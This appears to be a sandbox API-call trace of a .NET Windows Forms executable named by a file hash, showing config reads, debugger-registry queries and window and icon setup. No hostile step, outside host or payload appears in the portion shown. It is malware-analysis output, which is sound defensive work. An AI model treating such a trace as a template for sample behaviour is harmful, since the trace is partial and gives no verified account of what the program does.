[0160.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x28dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x43
[0160.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x28dd04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x43
[0160.809] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28df44) returned 1
[0160.810] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x28e208 | out: lpFileInformation=0x28e208*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63fb400, ftCreationTime.dwHighDateTime=0x1d4e4ee, ftLastAccessTime.dwLowDateTime=0xb9f350b0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xc63fb400, ftLastWriteTime.dwHighDateTime=0x1d4e4ee, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1
[0160.810] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28df40) returned 1
[0160.935] BCryptGetFipsAlgorithmMode (in: pfEnabled=0x28e0d4 | out: pfEnabled=0x28e0d4) returned 0x0
[0161.006] GetFileSize (in: hFile=0x1f0, lpFileSizeHigh=0x28ea20 | out: lpFileSizeHigh=0x28ea20*=0x0) returned 0x8c8e
[0161.008] ReadFile (in: hFile=0x1f0, lpBuffer=0x2871084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28e9dc, lpOverlapped=0x0 | out: lpBuffer=0x2871084*, lpNumberOfBytesRead=0x28e9dc*=0x1000, lpOverlapped=0x0) returned 1
[0161.027] ReadFile (in: hFile=0x1f0, lpBuffer=0x2871084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28e88c, lpOverlapped=0x0 | out: lpBuffer=0x2871084*, lpNumberOfBytesRead=0x28e88c*=0x1000, lpOverlapped=0x0) returned 1
[0161.029] ReadFile (in: hFile=0x1f0, lpBuffer=0x2871084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28e740, lpOverlapped=0x0 | out: lpBuffer=0x2871084*, lpNumberOfBytesRead=0x28e740*=0x1000, lpOverlapped=0x0) returned 1
[0161.031] ReadFile (in: hFile=0x1f0, lpBuffer=0x2871084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28e740, lpOverlapped=0x0 | out: lpBuffer=0x2871084*, lpNumberOfBytesRead=0x28e740*=0x1000, lpOverlapped=0x0) returned 1
[0161.031] ReadFile (in: hFile=0x1f0, lpBuffer=0x2871084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28e740, lpOverlapped=0x0 | out: lpBuffer=0x2871084*, lpNumberOfBytesRead=0x28e740*=0x1000, lpOverlapped=0x0) returned 1
[0161.032] ReadFile (in: hFile=0x1f0, lpBuffer=0x2871084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28e678, lpOverlapped=0x0 | out: lpBuffer=0x2871084*, lpNumberOfBytesRead=0x28e678*=0x1000, lpOverlapped=0x0) returned 1
[0161.039] ReadFile (in: hFile=0x1f0, lpBuffer=0x2871084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28e7e4, lpOverlapped=0x0 | out: lpBuffer=0x2871084*, lpNumberOfBytesRead=0x28e7e4*=0x1000, lpOverlapped=0x0) returned 1
[0161.042] ReadFile (in: hFile=0x1f0, lpBuffer=0x2871084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28e6d8, lpOverlapped=0x0 | out: lpBuffer=0x2871084*, lpNumberOfBytesRead=0x28e6d8*=0x1000, lpOverlapped=0x0) returned 1
[0161.042] ReadFile (in: hFile=0x1f0, lpBuffer=0x2871084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28e6d8, lpOverlapped=0x0 | out: lpBuffer=0x2871084*, lpNumberOfBytesRead=0x28e6d8*=0xc8e, lpOverlapped=0x0) returned 1
[0161.043] ReadFile (in: hFile=0x1f0, lpBuffer=0x2871084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28e79c, lpOverlapped=0x0 | out: lpBuffer=0x2871084*, lpNumberOfBytesRead=0x28e79c*=0x0, lpOverlapped=0x0) returned 1
[0161.043] CloseHandle (hObject=0x1f0) returned 1
[0161.044] CloseHandle (hObject=0x40) returned 1
[0161.044] GetCurrentProcess () returned 0xffffffff
[0161.045] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x28eb78 | out: TokenHandle=0x28eb78*=0x40) returned 1
[0161.046] CloseHandle (hObject=0x40) returned 1
[0161.046] GetCurrentProcess () returned 0xffffffff
[0161.046] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x28eb78 | out: TokenHandle=0x28eb78*=0x40) returned 1
[0161.047] CloseHandle (hObject=0x40) returned 1
[0161.054] GetCurrentProcess () returned 0xffffffff
[0161.055] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x28ea2c | out: TokenHandle=0x28ea2c*=0x40) returned 1
[0161.055] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe.config" (normalized: "c:\\users\\keecfmwgj\\desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x28ea24 | out: lpFileInformation=0x28ea24*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0161.056] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe.config", nBufferLength=0x105, lpBuffer=0x28e4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe.config", lpFilePart=0x0) returned 0x66
[0161.056] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe.config" (normalized: "c:\\users\\keecfmwgj\\desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x28ea2c | out: lpFileInformation=0x28ea2c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0161.056] CloseHandle (hObject=0x40) returned 1
[0161.057] GetCurrentProcess () returned 0xffffffff
[0161.057] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x28eb78 | out: TokenHandle=0x28eb78*=0x40) returned 1
[0161.057] CloseHandle (hObject=0x40) returned 1
[0161.058] GetCurrentProcess () returned 0xffffffff
[0161.058] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x28eb78 | out: TokenHandle=0x28eb78*=0x40) returned 1
[0161.059] CloseHandle (hObject=0x40) returned 1
[0161.077] GetCurrentProcess () returned 0xffffffff
[0161.077] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x28e990 | out: TokenHandle=0x28e990*=0x40) returned 1
[0161.085] CloseHandle (hObject=0x40) returned 1
[0161.085] GetCurrentProcess () returned 0xffffffff
[0161.086] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x28e9a8 | out: TokenHandle=0x28e9a8*=0x40) returned 1
[0161.092] CloseHandle (hObject=0x40) returned 1
[0161.102] GetSystemMetrics (nIndex=75) returned 1
[0161.114] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0
[0161.125] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x752b0000
[0161.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AddDllDirectory", cchWideChar=15, lpMultiByteStr=0x28ec74, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AddDllDirectory", lpUsedDefaultChar=0x0) returned 15
[0161.130] GetProcAddress (hModule=0x752b0000, lpProcName="AddDllDirectory") returned 0x753d1e91
[0161.130] LoadLibraryExW (lpLibFileName="comctl32.dll", hFile=0x0, dwFlags=0x800) returned 0x6eba0000
[0161.152] AdjustWindowRectEx (in: lpRect=0x28eddc, dwStyle=0x56cf0000, bMenu=0, dwExStyle=0x50001 | out: lpRect=0x28eddc) returned 1
[0161.159] GetCurrentProcess () returned 0xffffffff
[0161.159] GetCurrentThread () returned 0xfffffffe
[0161.159] GetCurrentProcess () returned 0xffffffff
[0161.159] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x28ecf4, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x28ecf4*=0x1f0) returned 1
[0161.164] GetCurrentThreadId () returned 0x5c0
[0161.181] GetModuleHandleW (lpModuleName="user32.dll") returned 0x76860000
[0161.181] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="DefWindowProcW", cchWideChar=14, lpMultiByteStr=0x28eb0c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefWindowProcWGm$\x1ez\\DþwqÌï(", lpUsedDefaultChar=0x0) returned 14
[0161.181] GetProcAddress (hModule=0x76860000, lpProcName="DefWindowProcW") returned 0x76f325dd
[0161.182] GetStockObject (i=5) returned 0x1900015
[0161.188] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0161.191] CoTaskMemAlloc (cb=0x5a) returned 0x7293f8
[0161.191] RegisterClassW (lpWndClass=0x28eafc) returned 0xc12d
[0161.193] CoTaskMemFree (pv=0x7293f8)
[0161.193] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0161.194] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.1a0e24_r14_ad1", lpWindowName=0x0, dwStyle=0x2010000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xfffffffd, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x80060
[0161.195] SetWindowLongW (hWnd=0x80060, nIndex=-4, dwNewLong=1995646429) returned 85788886
[0161.197] GetWindowLongW (hWnd=0x80060, nIndex=-4) returned 1995646429
[0161.206] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x28e410 | out: phkResult=0x28e410*=0x230) returned 0x0
[0161.207] RegQueryValueExW (in: hKey=0x230, lpValueName="DbgJITDebugLaunchSetting", lpReserved=0x0, lpType=0x28e430, lpData=0x0, lpcbData=0x28e42c*=0x0 | out: lpType=0x28e430*=0x0, lpData=0x0, lpcbData=0x28e42c*=0x0) returned 0x2
[0161.208] RegQueryValueExW (in: hKey=0x230, lpValueName="DbgManagedDebugger", lpReserved=0x0, lpType=0x28e430, lpData=0x0, lpcbData=0x28e42c*=0x0 | out: lpType=0x28e430*=0x0, lpData=0x0, lpcbData=0x28e42c*=0x0) returned 0x2
[0161.208] RegCloseKey (hKey=0x230) returned 0x0
[0161.209] SetWindowLongW (hWnd=0x80060, nIndex=-4, dwNewLong=85788926) returned 1995646429
[0161.210] GetWindowLongW (hWnd=0x80060, nIndex=-4) returned 85788926
[0161.210] GetWindowLongW (hWnd=0x80060, nIndex=-16) returned 113311744
[0161.211] RegisterClipboardFormatW (lpszFormat="WinFormsMouseEnter") returned 0xc073
[0161.212] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x80060, Msg=0x24, wParam=0x0, lParam=0x28e6e8) returned 0x0
[0161.212] RegisterClipboardFormatW (lpszFormat="WinFormsUnSubclass") returned 0xc076
[0161.213] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x80060, Msg=0x81, wParam=0x0, lParam=0x28e6dc) returned 0x1
[0161.213] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x80060, Msg=0x83, wParam=0x0, lParam=0x28e6c8) returned 0x0
[0161.213] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x80060, Msg=0x1, wParam=0x0, lParam=0x28e6dc) returned 0x0
[0161.214] GetClientRect (in: hWnd=0x80060, lpRect=0x28e444 | out: lpRect=0x28e444) returned 1
[0161.214] GetWindowRect (in: hWnd=0x80060, lpRect=0x28e444 | out: lpRect=0x28e444) returned 1
[0161.216] GetParent (hWnd=0x80060) returned 0x0
[0161.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", nBufferLength=0x105, lpBuffer=0x28e850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", lpFilePart=0x0) returned 0x77
[0161.240] IsAppThemed () returned 0x1
[0161.241] CoTaskMemAlloc (cb=0xf0) returned 0x7636d8
[0161.241] CreateActCtxA (pActCtx=0x28ed74) returned 0x765c7c
[0161.247] CoTaskMemFree (pv=0x7636d8)
[0161.249] GetCurrentActCtx (in: lphActCtx=0x28f1e0 | out: lphActCtx=0x28f1e0*=0x0) returned 1
[0161.249] ActivateActCtx (in: hActCtx=0x765c7c, lpCookie=0x28f1f0 | out: hActCtx=0x765c7c, lpCookie=0x28f1f0) returned 1
[0161.250] GetCurrentActCtx (in: lphActCtx=0x28f000 | out: lphActCtx=0x28f000*=0x765c7c) returned 1
[0161.250] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0161.250] CreateWindowExW (dwExStyle=0x10000, lpClassName="WindowsForms10.Window.8.app.0.1a0e24_r14_ad1", lpWindowName=0x0, dwStyle=0x22cf0000, X=-2147483648, Y=-2147483648, nWidth=300, nHeight=300, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x7005c
[0161.252] SetWindowLongW (hWnd=0x7005c, nIndex=-4, dwNewLong=1995646429) returned 85788886
[0161.252] GetWindowLongW (hWnd=0x7005c, nIndex=-4) returned 1995646429
[0161.252] SetWindowLongW (hWnd=0x7005c, nIndex=-4, dwNewLong=85788966) returned 1995646429
[0161.252] GetWindowLongW (hWnd=0x7005c, nIndex=-4) returned 85788966
[0161.252] GetWindowLongW (hWnd=0x7005c, nIndex=-16) returned 651100160
[0161.252] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x81, wParam=0x0, lParam=0x28ea88) returned 0x1
[0161.255] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x83, wParam=0x0, lParam=0x28ea74) returned 0x0
[0161.554] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x1, wParam=0x0, lParam=0x28ea88) returned 0x0
[0161.554] GetClientRect (in: hWnd=0x7005c, lpRect=0x28e7c0 | out: lpRect=0x28e7c0) returned 1
[0161.554] GetWindowRect (in: hWnd=0x7005c, lpRect=0x28e7c0 | out: lpRect=0x28e7c0) returned 1
[0161.555] GetWindowTextLengthW (hWnd=0x7005c) returned 0
[0161.555] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0
[0161.555] GetSystemMetrics (nIndex=42) returned 0
[0161.556] GetWindowTextW (in: hWnd=0x7005c, lpString=0x28e638, nMaxCount=1 | out: lpString="") returned 0
[0161.556] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0xd, wParam=0x1, lParam=0x28e638) returned 0x0
[0161.568] GetProcessWindowStation () returned 0x60
[0161.569] GetUserObjectInformationA (in: hObj=0x60, nIndex=1, pvInfo=0x288dfa0, nLength=0xc, lpnLengthNeeded=0x28e6b8 | out: pvInfo=0x288dfa0, lpnLengthNeeded=0x28e6b8) returned 1
[0161.572] SetConsoleCtrlHandler (HandlerRoutine=0x51d094e, Add=1) returned 1
[0161.573] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0161.573] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0161.576] GetClassInfoW (in: hInstance=0x400000, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.1a0e24.0", lpWndClass=0x288e010 | out: lpWndClass=0x288e010) returned 0
[0161.579] CoTaskMemAlloc (cb=0x56) returned 0x702b78
[0161.579] RegisterClassW (lpWndClass=0x28e608) returned 0xc1d0
[0161.579] CoTaskMemFree (pv=0x702b78)
[0161.581] CreateWindowExW (dwExStyle=0x0, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.1a0e24.0", lpWindowName=".NET-BroadcastEventWindow.4.0.0.0.1a0e24.0", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x50254
[0161.581] NtdllDefWindowProc_W () returned 0x1
[0161.581] NtdllDefWindowProc_W () returned 0x0
[0161.581] NtdllDefWindowProc_W () returned 0x0
[0161.582] NtdllDefWindowProc_W () returned 0x0
[0161.582] NtdllDefWindowProc_W () returned 0x0
[0161.587] GetStartupInfoW (in: lpStartupInfo=0x288e440 | out: lpStartupInfo=0x288e440*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0))
[0161.588] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x46, wParam=0x0, lParam=0x28ea9c) returned 0x0
[0161.589] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x83, wParam=0x1, lParam=0x28ea74) returned 0x0
[0161.592] GetWindowPlacement (in: hWnd=0x7005c, lpwndpl=0x28e84c | out: lpwndpl=0x28e84c) returned 1
[0161.592] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x47, wParam=0x0, lParam=0x28ea9c) returned 0x0
[0161.592] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x3, wParam=0x0, lParam=0x83008300) returned 0x0
[0161.592] GetClientRect (in: hWnd=0x7005c, lpRect=0x28e360 | out: lpRect=0x28e360) returned 1
[0161.592] GetWindowRect (in: hWnd=0x7005c, lpRect=0x28e360 | out: lpRect=0x28e360) returned 1
[0161.592] GetWindowTextLengthW (hWnd=0x7005c) returned 0
[0161.592] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0
[0161.592] GetSystemMetrics (nIndex=42) returned 0
[0161.592] GetWindowTextW (in: hWnd=0x7005c, lpString=0x28e1d8, nMaxCount=1 | out: lpString="") returned 0
[0161.592] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0xd, wParam=0x1, lParam=0x28e1d8) returned 0x0
[0161.593] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x5, wParam=0x1, lParam=0x0) returned 0x0
[0161.593] GetClientRect (in: hWnd=0x7005c, lpRect=0x28e7fc | out: lpRect=0x28e7fc) returned 1
[0161.593] GetWindowRect (in: hWnd=0x7005c, lpRect=0x28e7fc | out: lpRect=0x28e7fc) returned 1
[0161.593] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0xd, wParam=0x104, lParam=0x4ccc5e0) returned 0x0
[0161.593] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x0
[0161.593] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x7f, wParam=0x0, lParam=0x0) returned 0x0
[0161.593] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x7f, wParam=0x1, lParam=0x0) returned 0x0
[0161.595] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x83, wParam=0x1, lParam=0x28e680) returned 0x0
[0161.596] GetParent (hWnd=0x7005c) returned 0x0
[0161.602] GetStockObject (i=5) returned 0x1900015
[0161.602] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0161.603] CoTaskMemAlloc (cb=0x5a) returned 0x7293f8
[0161.603] RegisterClassW (lpWndClass=0x28eed0) returned 0xc1d1
[0161.603] CoTaskMemFree (pv=0x7293f8)
[0161.603] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0161.603] CreateWindowExW (dwExStyle=0x80, lpClassName="WindowsForms10.Window.0.app.0.1a0e24_r14_ad1", lpWindowName=0x0, dwStyle=0x0, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x501fe
[0161.603] SetWindowLongW (hWnd=0x501fe, nIndex=-4, dwNewLong=1995646429) returned 85789086
[0161.604] GetWindowLongW (hWnd=0x501fe, nIndex=-4) returned 1995646429
[0161.604] SetWindowLongW (hWnd=0x501fe, nIndex=-4, dwNewLong=85789126) returned 1995646429
[0161.604] GetWindowLongW (hWnd=0x501fe, nIndex=-4) returned 85789126
[0161.604] GetWindowLongW (hWnd=0x501fe, nIndex=-16) returned 79691776
[0161.605] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x24, wParam=0x0, lParam=0x28eabc) returned 0x0
[0161.605] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x81, wParam=0x0, lParam=0x28eab0) returned 0x1
[0161.605] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x83, wParam=0x0, lParam=0x28ea9c) returned 0x0
[0161.606] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x1, wParam=0x0, lParam=0x28eab0) returned 0x0
[0161.606] SetWindowLongW (hWnd=0x7005c, nIndex=-8, dwNewLong=328190) returned 0
[0161.620] GetSystemMetrics (nIndex=11) returned 32
[0161.620] GetSystemMetrics (nIndex=12) returned 32
[0161.621] GetDC (hWnd=0x0) returned 0x12010184
[0161.625] GetDeviceCaps (hdc=0x12010184, index=12) returned 32
[0161.625] GetDeviceCaps (hdc=0x12010184, index=14) returned 1
[0161.626] ReleaseDC (hWnd=0x0, hDC=0x12010184) returned 1
[0161.627] CreateIconFromResourceEx (presbits=0x2891468, dwResSize=0x10a8, fIcon=1, dwVer=0x30000, cxDesired=0, cyDesired=0, Flags=0x0) returned 0xb00d9
[0161.629] GetSystemMetrics (nIndex=49) returned 16
[0161.629] GetSystemMetrics (nIndex=50) returned 16
[0161.629] CreateIconFromResourceEx (presbits=0x2892558, dwResSize=0x468, fIcon=1, dwVer=0x30000, cxDesired=0, cyDesired=0, Flags=0x0) returned 0x502a9
[0161.631] SendMessageW (hWnd=0x7005c, Msg=0x80, wParam=0x0, lParam=0x502a9) returned 0x0
[0161.631] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x80, wParam=0x0, lParam=0x502a9) returned 0x0
[0161.631] SendMessageW (hWnd=0x7005c, Msg=0x80, wParam=0x1, lParam=0xb00d9) returned 0x0
[0161.631] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x80, wParam=0x1, lParam=0xb00d9) returned 0x0
[0161.631] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0xd, wParam=0x104, lParam=0x4ccc5e0) returned 0x0
[0161.631] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x502a9
[0161.633] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0xd, wParam=0x104, lParam=0x4ccc658) returned 0x0
[0161.634] GetSystemMenu (hWnd=0x7005c, bRevert=0) returned 0x402a7
[0161.694] GetWindowPlacement (in: hWnd=0x7005c, lpwndpl=0x28f010 | out: lpwndpl=0x28f010) returned 1
[0161.694] EnableMenuItem (hMenu=0x402a7, uIDEnableItem=0xf020, uEnable=0x1) returned 0
[0161.694] EnableMenuItem (hMenu=0x402a7, uIDEnableItem=0xf030, uEnable=0x0) returned 0
[0161.694] EnableMenuItem (hMenu=0x402a7, uIDEnableItem=0xf060, uEnable=0x0) returned 0
[0161.694] EnableMenuItem (hMenu=0x402a7, uIDEnableItem=0xf120, uEnable=0x0) returned 0
[0161.694] EnableMenuItem (hMenu=0x402a7, uIDEnableItem=0xf000, uEnable=0x1) returned 0
[0161.694] SetWindowLongW (hWnd=0x7005c, nIndex=-8, dwNewLong=328190) returned 328190
[0161.695] SendMessageW (hWnd=0x501fe, Msg=0x80, wParam=0x1, lParam=0xb00d9) returned 0x0
[0161.695] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x80, wParam=0x1, lParam=0xb00d9) returned 0x0
[0161.696] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0xd, wParam=0x104, lParam=0x4ccc658) returned 0x0
[0161.697] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0xd, wParam=0x104, lParam=0x4ccc658) returned 0x0
[0161.697] GetWindowLongW (hWnd=0x7005c, nIndex=-16) returned 651100160
[0161.697] GetWindowTextLengthW (hWnd=0x7005c) returned 0
[0161.697] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0
[0161.697] GetSystemMetrics (nIndex=42) returned 0
[0161.697] GetWindowTextW (in: hWnd=0x7005c, lpString=0x28ef60, nMaxCount=1 | out: lpString="") returned 0
[0161.697] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0xd, wParam=0x1, lParam=0x28ef60) returned 0x0
[0161.697] GetWindowTextLengthW (hWnd=0x7005c) returned 0
[0161.697] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0
[0161.697] GetSystemMetrics (nIndex=42) returned 0
[0161.697] GetWindowTextW (in: hWnd=0x7005c, lpString=0x28ef60, nMaxCount=1 | out: lpString="") returned 0
[0161.697] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0xd, wParam=0x1, lParam=0x28ef60) returned 0x0
[0161.697] GetWindowLongW (hWnd=0x7005c, nIndex=-16) returned 651100160
[0161.698] GetWindowLongW (hWnd=0x7005c, nIndex=-20) returned 65792
[0161.698] SetWindowLongW (hWnd=0x7005c, nIndex=-16, dwNewLong=583991296) returned 651100160
[0161.698] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x7c, wParam=0xfffffff0, lParam=0x28efa8) returned 0x0
[0161.698] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x7d, wParam=0xfffffff0, lParam=0x28efa8) returned 0x0
[0161.698] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0xd, wParam=0x104, lParam=0x4ccc658) returned 0x0
[0161.698] SetWindowLongW (hWnd=0x7005c, nIndex=-20, dwNewLong=65536) returned 65792
[0161.698] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x7c, wParam=0xffffffec, lParam=0x28efa8) returned 0x0
[0161.699] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x7d, wParam=0xffffffec, lParam=0x28efa8) returned 0x0
